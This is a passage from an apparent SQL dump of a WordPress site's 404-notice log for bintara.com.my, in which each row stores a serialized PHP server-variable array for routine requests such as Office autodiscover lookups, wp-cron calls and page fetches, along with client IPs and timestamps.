:9:\"UNIQUE_ID\";s:27:\"XaRGce64dmMiXPBY9-kOYAAAAIU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571047025.233\";s:12:\"REQUEST_TIME\";s:10:\"1571047025\";}}','notice','2019-10-14 09:57:10','2019-10-14 09:57:05',34319592,36118832,'https://bintara.com.my/send-quote-teamviewer/',1,0,'207.46.13.174'),(28023,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"0697F61A-5783-4CC0-AA04-D8B27959379E\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaQ6YL0j4KqzOPWDFBMHawAAAgY\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.142.119.93\";s:11:\"REMOTE_PORT\";s:5:\"62467\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaQ6YL0j4KqzOPWDFBMHawAAAgY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571043936.5856\";s:12:\"REQUEST_TIME\";s:10:\"1571043936\";}}','notice','2019-10-14 09:05:40','2019-10-14 09:05:37',35737784,37546552,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.119.93'),(28022,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.12026; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"9DA2FF5F-F48B-4B16-811E-A6672131582D\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.12026\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaQ0IL0j4KqzOPWDFBMAyQAAAhg\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.142.119.93\";s:11:\"REMOTE_PORT\";s:5:\"50147\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaQ0IL0j4KqzOPWDFBMAyQAAAhg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571042336.7256\";s:12:\"REQUEST_TIME\";s:10:\"1571042336\";}}','notice','2019-10-14 08:39:01','2019-10-14 08:38:57',35741232,37546296,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.119.93'),(28021,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"493E0505-E1EE-4657-98D9-296BF2F849C9\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaQwSmQflmQKZNUpCue18wAAANY\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.142.119.93\";s:11:\"REMOTE_PORT\";s:5:\"50590\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaQwSmQflmQKZNUpCue18wAAANY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571041354.8025\";s:12:\"REQUEST_TIME\";s:10:\"1571041354\";}}','notice','2019-10-14 08:22:39','2019-10-14 08:22:35',35839968,37651680,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.119.93'),(28020,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:83:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571040213.3991999626159667968750\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571040213.3991999626159667968750\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571040213.3991999626159667968750\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:29:\"/sbin:/usr/sbin:/bin:/usr/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1571040213.3991999626159667968750\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"54546\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571040213.3991999626159667968750\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaQr1XBxr6HKHzoM2bpU0AAAAFg\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaQr1XBxr6HKHzoM2bpU0AAAAFg\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"54546\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaQr1XBxr6HKHzoM2bpU0AAAAFg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571040899.3548\";s:12:\"REQUEST_TIME\";s:10:\"1571040899\";}}','notice','2019-10-14 08:15:03','2019-10-14 08:14:59',35059560,35312032,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1571040213.3991999626159667968750',1,0,'103.6.198.69'),(28018,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3423.2 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"217.170.192.245\";s:11:\"REMOTE_PORT\";s:5:\"57469\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaQfv70j4KqzOPWDFBPzZwAAAg8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571037119.547\";s:12:\"REQUEST_TIME\";s:10:\"1571037119\";}}','notice','2019-10-14 07:12:03','2019-10-14 07:12:00',35427216,37231368,'https://bintara.com.my/?page_id=18',1,0,'217.170.192.245'),(28019,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/22.html\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:14:\"bytes=0-524287\";s:15:\"HTTP_USER_AGENT\";s:73:\"facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/22.html\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/22.html\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaQhCb0j4KqzOPWDFBPz-AAAAg0\";s:12:\"REDIRECT_URL\";s:8:\"/22.html\";s:11:\"REMOTE_ADDR\";s:13:\"173.252.87.16\";s:11:\"REMOTE_PORT\";s:5:\"53504\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/22.html\";s:10:\"SCRIPT_URL\";s:8:\"/22.html\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaQhCb0j4KqzOPWDFBPz-AAAAg0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571037450.9142\";s:12:\"REQUEST_TIME\";s:10:\"1571037450\";}}','notice','2019-10-14 07:17:32','2019-10-14 07:17:31',35469008,35826392,'https://bintara.com.my/22.html',1,0,'173.252.87.16'),(28017,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:120:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"108.161.133.165\";s:11:\"REMOTE_PORT\";s:5:\"56531\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaQPur0j4KqzOPWDFBPn1gAAAg0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571033018.5317\";s:12:\"REQUEST_TIME\";s:10:\"1571033018\";}}','notice','2019-10-14 06:03:40','2019-10-14 06:03:39',35030176,36838568,'https://bintara.com.my/?page_id=18',1,0,'108.161.133.165'),(28016,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.2372.400 